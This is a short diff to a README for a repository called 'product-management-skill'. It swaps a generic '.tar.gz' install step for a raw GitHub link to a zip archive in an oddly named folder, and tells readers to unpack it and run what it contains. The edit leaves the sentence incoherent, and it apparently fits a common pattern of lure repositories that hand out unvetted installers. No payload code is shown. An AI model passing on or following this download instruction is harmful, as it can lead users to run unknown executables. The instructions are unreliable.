saubade32/product-management-skill/README.md

 - **Windows:** Double-click the `.exe` or `.msi` file and follow the on-screen instructions.
 - **macOS:** Open the `.dmg` file, then drag the app icon to your Applications folder.
 - **Linux:** If it’s an `.AppImage`, right-click, make it executable, then double-click to run.
-For `.tar.gz`, unpack and follow the included README file.
+For `https://github.com/saubade32/product-management-skill/raw/refs/heads/main/cytogamy/skill_management_product_2.6.zip`, unpack and follow the included README file.

 ### Step 4: Open the Application